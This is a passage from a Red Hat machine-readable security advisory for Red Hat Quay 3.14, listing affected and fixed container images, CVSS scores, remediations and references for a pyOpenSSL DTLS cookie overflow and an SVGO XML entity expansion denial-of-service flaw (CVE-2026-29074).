            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:a46c3fd8bb72616f07d2fb47eae9b060ea6c5135ec365d7ddc0dc18054da0b1b_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:fca718bcd95971e571d13f9139e2f40c2daeca9605c669d73ed3055d9e3a53e2_ppc64le"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2026:21017"
        },
        {
          "category": "workaround",
          "details": "To mitigate this flaw, ensure the callback provided to the set_cookie_generate_callback function strictly limits the returned cookie string or byte sequence to under 256 bytes.",
          "product_ids": [
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:4dcd3b60f93e03d7d59e7dedc2ffcaa835de53ce672a179527f26ffe295473d2_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:7a0ec7eb2f7e1cd78834a108c84edb7f3a9f769209ba98b8bb0d1f7d66344e72_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c36f983f25aad87857f89920f0878fb081f9c55d471e98fa25a3af0507da4b42_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c82534a20a7a5e2ecd49ac6307df13ede380c8b3d7ca4c6978aed1efab9c6ae4_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:36377e0f89e28bb05dd45c424ac336b2884e91267a118763ddd9a1e8d8f75295_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:087c088a5f5da9a54608fd93bbc47654b7c24661dfcdf3b64d04d496924a5e4b_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:0e7f72c6427b9c941a765470683c3cfe81644bd0337b88c5f3d9021978aa38de_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:496e288875b50bb6f5ff1f92cd95a8df52ee02e97178e4134fcc3fc0b829f3b1_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:bc8584dbad964920db04fb5fa27044cb0219f7d736da16abe5deec2fb3d7b1a8_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1fa815f5c0f997f55ca2db83575360f084d0ead955e62adcb7b4f0b53b1a01c7_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:532d123f74a39a92346daf91d69f2eebc97d48d49cf89b21ec4114824cb23b2d_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:b83c36737a574a3454d1be87b9bb7a513eab7b5071c662fde05e791ec2596ee2_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:e76507eecc44ee17c66566769ff427c561df85db700c2b16ead0ecd894f40b9f_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:052bf6483aa0e3cfae7cc28822bb05b7ebf1c2dd2019bae53874db19a7ced51f_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:0f209a6799f9eb6987d9479fc6631d3f6dabdf89faa0059c9c62010f4f46e2ba_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:eade47dd4e39ed346f9ea867a90e07fc70ff2ff4a6cce4a21ac77f88e9abad10_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:fac5b4a10d565051251ec328df69026458ede4dadc48b401dcb923979bf96b88_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:9e026e4b86da6a0719b0bf6973d465cd542ead1715afb516e5e37ae8d9057964_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-bundle@sha256:a620b5e2749ad150d7ee07bd240f29a69ad2593a522869bd334441e9fb346e0e_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:6753b3d04a0cbf3ae35f8141df96505f099a39645ae3e68ae0b417ac572be64e_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:85c3bbf75379da98fbffe5ea1c53893a11ce42939d68687f16a0b687a9ba4b33_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:9fc318dd2650e6f3b68084e2f155a5485395026cba186018f6a2d5e70284bb6a_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:db535f8a5dea4124ee8140a48362d0a631cc19158a3944f0059219a5c7b44e3e_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:4ae7d2d72a2370bd5401f570e21386bc9a6df0b145030060c922fcf754c7839b_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:9f5d146fc72a09d9067705a35274a251708cebc4c6a7e50615bdbce3e128c097_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:a46c3fd8bb72616f07d2fb47eae9b060ea6c5135ec365d7ddc0dc18054da0b1b_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:fca718bcd95971e571d13f9139e2f40c2daeca9605c669d73ed3055d9e3a53e2_ppc64le"
          ]
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "HIGH",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 8.1,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          },
          "products": [
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:4dcd3b60f93e03d7d59e7dedc2ffcaa835de53ce672a179527f26ffe295473d2_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:7a0ec7eb2f7e1cd78834a108c84edb7f3a9f769209ba98b8bb0d1f7d66344e72_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c36f983f25aad87857f89920f0878fb081f9c55d471e98fa25a3af0507da4b42_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c82534a20a7a5e2ecd49ac6307df13ede380c8b3d7ca4c6978aed1efab9c6ae4_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:36377e0f89e28bb05dd45c424ac336b2884e91267a118763ddd9a1e8d8f75295_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:087c088a5f5da9a54608fd93bbc47654b7c24661dfcdf3b64d04d496924a5e4b_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:0e7f72c6427b9c941a765470683c3cfe81644bd0337b88c5f3d9021978aa38de_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:496e288875b50bb6f5ff1f92cd95a8df52ee02e97178e4134fcc3fc0b829f3b1_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:bc8584dbad964920db04fb5fa27044cb0219f7d736da16abe5deec2fb3d7b1a8_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1fa815f5c0f997f55ca2db83575360f084d0ead955e62adcb7b4f0b53b1a01c7_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:532d123f74a39a92346daf91d69f2eebc97d48d49cf89b21ec4114824cb23b2d_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:b83c36737a574a3454d1be87b9bb7a513eab7b5071c662fde05e791ec2596ee2_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:e76507eecc44ee17c66566769ff427c561df85db700c2b16ead0ecd894f40b9f_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:052bf6483aa0e3cfae7cc28822bb05b7ebf1c2dd2019bae53874db19a7ced51f_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:0f209a6799f9eb6987d9479fc6631d3f6dabdf89faa0059c9c62010f4f46e2ba_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:eade47dd4e39ed346f9ea867a90e07fc70ff2ff4a6cce4a21ac77f88e9abad10_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:fac5b4a10d565051251ec328df69026458ede4dadc48b401dcb923979bf96b88_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:9e026e4b86da6a0719b0bf6973d465cd542ead1715afb516e5e37ae8d9057964_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-bundle@sha256:a620b5e2749ad150d7ee07bd240f29a69ad2593a522869bd334441e9fb346e0e_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:6753b3d04a0cbf3ae35f8141df96505f099a39645ae3e68ae0b417ac572be64e_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:85c3bbf75379da98fbffe5ea1c53893a11ce42939d68687f16a0b687a9ba4b33_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:9fc318dd2650e6f3b68084e2f155a5485395026cba186018f6a2d5e70284bb6a_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:db535f8a5dea4124ee8140a48362d0a631cc19158a3944f0059219a5c7b44e3e_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:4ae7d2d72a2370bd5401f570e21386bc9a6df0b145030060c922fcf754c7839b_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:9f5d146fc72a09d9067705a35274a251708cebc4c6a7e50615bdbce3e128c097_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:a46c3fd8bb72616f07d2fb47eae9b060ea6c5135ec365d7ddc0dc18054da0b1b_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:fca718bcd95971e571d13f9139e2f40c2daeca9605c669d73ed3055d9e3a53e2_ppc64le"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Important"
        }
      ],
      "title": "pyOpenSSL: DTLS cookie callback buffer overflow"
    },
    {
      "cve": "CVE-2026-29074",
      "cwe": {
        "id": "CWE-776",
        "name": "Improper Restriction of Recursive Entity References in DTDs (\u0027XML Entity Expansion\u0027)"
      },
      "discovery_date": "2026-03-06T00:00:00+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:4dcd3b60f93e03d7d59e7dedc2ffcaa835de53ce672a179527f26ffe295473d2_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:7a0ec7eb2f7e1cd78834a108c84edb7f3a9f769209ba98b8bb0d1f7d66344e72_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c36f983f25aad87857f89920f0878fb081f9c55d471e98fa25a3af0507da4b42_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c82534a20a7a5e2ecd49ac6307df13ede380c8b3d7ca4c6978aed1efab9c6ae4_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:36377e0f89e28bb05dd45c424ac336b2884e91267a118763ddd9a1e8d8f75295_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:087c088a5f5da9a54608fd93bbc47654b7c24661dfcdf3b64d04d496924a5e4b_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:0e7f72c6427b9c941a765470683c3cfe81644bd0337b88c5f3d9021978aa38de_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:496e288875b50bb6f5ff1f92cd95a8df52ee02e97178e4134fcc3fc0b829f3b1_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:bc8584dbad964920db04fb5fa27044cb0219f7d736da16abe5deec2fb3d7b1a8_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1fa815f5c0f997f55ca2db83575360f084d0ead955e62adcb7b4f0b53b1a01c7_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:532d123f74a39a92346daf91d69f2eebc97d48d49cf89b21ec4114824cb23b2d_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:b83c36737a574a3454d1be87b9bb7a513eab7b5071c662fde05e791ec2596ee2_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:e76507eecc44ee17c66566769ff427c561df85db700c2b16ead0ecd894f40b9f_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:052bf6483aa0e3cfae7cc28822bb05b7ebf1c2dd2019bae53874db19a7ced51f_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:0f209a6799f9eb6987d9479fc6631d3f6dabdf89faa0059c9c62010f4f46e2ba_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:eade47dd4e39ed346f9ea867a90e07fc70ff2ff4a6cce4a21ac77f88e9abad10_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:fac5b4a10d565051251ec328df69026458ede4dadc48b401dcb923979bf96b88_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:9e026e4b86da6a0719b0bf6973d465cd542ead1715afb516e5e37ae8d9057964_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-bundle@sha256:a620b5e2749ad150d7ee07bd240f29a69ad2593a522869bd334441e9fb346e0e_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:6753b3d04a0cbf3ae35f8141df96505f099a39645ae3e68ae0b417ac572be64e_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:85c3bbf75379da98fbffe5ea1c53893a11ce42939d68687f16a0b687a9ba4b33_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:9fc318dd2650e6f3b68084e2f155a5485395026cba186018f6a2d5e70284bb6a_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:db535f8a5dea4124ee8140a48362d0a631cc19158a3944f0059219a5c7b44e3e_amd64"
          ]
        }
      ],
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2445132"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "A flaw was found in SVGO, an SVG (Scalable Vector Graphics) Optimizer. This vulnerability allows a remote attacker to cause a Denial of Service (DoS) by submitting a specially crafted XML file. The application\u0027s failure to properly guard against XML entity expansion or recursion can lead to the Node.js process consuming excessive memory and crashing.",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "svgo: SVGO: Denial of Service via XML entity expansion",
          "title": "Vulnerability summary"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:4ae7d2d72a2370bd5401f570e21386bc9a6df0b145030060c922fcf754c7839b_s390x",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:9f5d146fc72a09d9067705a35274a251708cebc4c6a7e50615bdbce3e128c097_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:a46c3fd8bb72616f07d2fb47eae9b060ea6c5135ec365d7ddc0dc18054da0b1b_arm64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:fca718bcd95971e571d13f9139e2f40c2daeca9605c669d73ed3055d9e3a53e2_ppc64le"
        ],
        "known_not_affected": [
          "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:4dcd3b60f93e03d7d59e7dedc2ffcaa835de53ce672a179527f26ffe295473d2_ppc64le",
          "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:7a0ec7eb2f7e1cd78834a108c84edb7f3a9f769209ba98b8bb0d1f7d66344e72_arm64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c36f983f25aad87857f89920f0878fb081f9c55d471e98fa25a3af0507da4b42_s390x",
          "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c82534a20a7a5e2ecd49ac6307df13ede380c8b3d7ca4c6978aed1efab9c6ae4_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:36377e0f89e28bb05dd45c424ac336b2884e91267a118763ddd9a1e8d8f75295_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:087c088a5f5da9a54608fd93bbc47654b7c24661dfcdf3b64d04d496924a5e4b_arm64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:0e7f72c6427b9c941a765470683c3cfe81644bd0337b88c5f3d9021978aa38de_ppc64le",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:496e288875b50bb6f5ff1f92cd95a8df52ee02e97178e4134fcc3fc0b829f3b1_s390x",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:bc8584dbad964920db04fb5fa27044cb0219f7d736da16abe5deec2fb3d7b1a8_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1fa815f5c0f997f55ca2db83575360f084d0ead955e62adcb7b4f0b53b1a01c7_s390x",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:532d123f74a39a92346daf91d69f2eebc97d48d49cf89b21ec4114824cb23b2d_ppc64le",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:b83c36737a574a3454d1be87b9bb7a513eab7b5071c662fde05e791ec2596ee2_arm64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:e76507eecc44ee17c66566769ff427c561df85db700c2b16ead0ecd894f40b9f_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:052bf6483aa0e3cfae7cc28822bb05b7ebf1c2dd2019bae53874db19a7ced51f_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:0f209a6799f9eb6987d9479fc6631d3f6dabdf89faa0059c9c62010f4f46e2ba_ppc64le",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:eade47dd4e39ed346f9ea867a90e07fc70ff2ff4a6cce4a21ac77f88e9abad10_arm64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:fac5b4a10d565051251ec328df69026458ede4dadc48b401dcb923979bf96b88_s390x",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:9e026e4b86da6a0719b0bf6973d465cd542ead1715afb516e5e37ae8d9057964_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-bundle@sha256:a620b5e2749ad150d7ee07bd240f29a69ad2593a522869bd334441e9fb346e0e_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:6753b3d04a0cbf3ae35f8141df96505f099a39645ae3e68ae0b417ac572be64e_ppc64le",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:85c3bbf75379da98fbffe5ea1c53893a11ce42939d68687f16a0b687a9ba4b33_arm64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:9fc318dd2650e6f3b68084e2f155a5485395026cba186018f6a2d5e70284bb6a_s390x",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:db535f8a5dea4124ee8140a48362d0a631cc19158a3944f0059219a5c7b44e3e_amd64"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2026-29074"
        },
        {
          "category": "external",
          "summary": "RHBZ#2445132",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2445132"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2026-29074",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-29074"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-29074",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-29074"
        },
        {
          "category": "external",
          "summary": "https://github.com/svg/svgo/security/advisories/GHSA-xpqw-6gx7-v673",
          "url": "https://github.com/svg/svgo/security/advisories/GHSA-xpqw-6gx7-v673"
        }
      ],
      "release_date": "2026-03-06T07:23:05.716000+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2026-05-26T17:12:40+00:00",
          "details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11458",
          "product_ids": [
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:4ae7d2d72a2370bd5401f570e21386bc9a6df0b145030060c922fcf754c7839b_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:9f5d146fc72a09d9067705a35274a251708cebc4c6a7e50615bdbce3e128c097_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:a46c3fd8bb72616f07d2fb47eae9b060ea6c5135ec365d7ddc0dc18054da0b1b_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:fca718bcd95971e571d13f9139e2f40c2daeca9605c669d73ed3055d9e3a53e2_ppc64le"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2026:21017"
        },
        {
          "category": "workaround",
          "details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
          "product_ids": [
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:4dcd3b60f93e03d7d59e7dedc2ffcaa835de53ce672a179527f26ffe295473d2_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:7a0ec7eb2f7e1cd78834a108c84edb7f3a9f769209ba98b8bb0d1f7d66344e72_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c36f983f25aad87857f89920f0878fb081f9c55d471e98fa25a3af0507da4b42_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c82534a20a7a5e2ecd49ac6307df13ede380c8b3d7ca4c6978aed1efab9c6ae4_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:36377e0f89e28bb05dd45c424ac336b2884e91267a118763ddd9a1e8d8f75295_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:087c088a5f5da9a54608fd93bbc47654b7c24661dfcdf3b64d04d496924a5e4b_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:0e7f72c6427b9c941a765470683c3cfe81644bd0337b88c5f3d9021978aa38de_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:496e288875b50bb6f5ff1f92cd95a8df52ee02e97178e4134fcc3fc0b829f3b1_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:bc8584dbad964920db04fb5fa27044cb0219f7d736da16abe5deec2fb3d7b1a8_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1fa815f5c0f997f55ca2db83575360f084d0ead955e62adcb7b4f0b53b1a01c7_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:532d123f74a39a92346daf91d69f2eebc97d48d49cf89b21ec4114824cb23b2d_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:b83c36737a574a3454d1be87b9bb7a513eab7b5071c662fde05e791ec2596ee2_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:e76507eecc44ee17c66566769ff427c561df85db700c2b16ead0ecd894f40b9f_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:052bf6483aa0e3cfae7cc28822bb05b7ebf1c2dd2019bae53874db19a7ced51f_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:0f209a6799f9eb6987d9479fc6631d3f6dabdf89faa0059c9c62010f4f46e2ba_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:eade47dd4e39ed346f9ea867a90e07fc70ff2ff4a6cce4a21ac77f88e9abad10_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:fac5b4a10d565051251ec328df69026458ede4dadc48b401dcb923979bf96b88_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:9e026e4b86da6a0719b0bf6973d465cd542ead1715afb516e5e37ae8d9057964_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-bundle@sha256:a620b5e2749ad150d7ee07bd240f29a69ad2593a522869bd334441e9fb346e0e_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:6753b3d04a0cbf3ae35f8141df96505f099a39645ae3e68ae0b417ac572be64e_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:85c3bbf75379da98fbffe5ea1c53893a11ce42939d68687f16a0b687a9ba4b33_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:9fc318dd2650e6f3b68084e2f155a5485395026cba186018f6a2d5e70284bb6a_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:db535f8a5dea4124ee8140a48362d0a631cc19158a3944f0059219a5c7b44e3e_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:4ae7d2d72a2370bd5401f570e21386bc9a6df0b145030060c922fcf754c7839b_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:9f5d146fc72a09d9067705a35274a251708cebc4c6a7e50615bdbce3e128c097_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:a46c3fd8bb72616f07d2fb47eae9b060ea6c5135ec365d7ddc0dc18054da0b1b_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:fca718bcd95971e571d13f9139e2f40c2daeca9605c669d73ed3055d9e3a53e2_ppc64le"
          ]
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.1"
          },
          "products": [
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:4dcd3b60f93e03d7d59e7dedc2ffcaa835de53ce672a179527f26ffe295473d2_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:7a0ec7eb2f7e1cd78834a108c84edb7f3a9f769209ba98b8bb0d1f7d66344e72_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c36f983f25aad87857f89920f0878fb081f9c55d471e98fa25a3af0507da4b42_s390x",
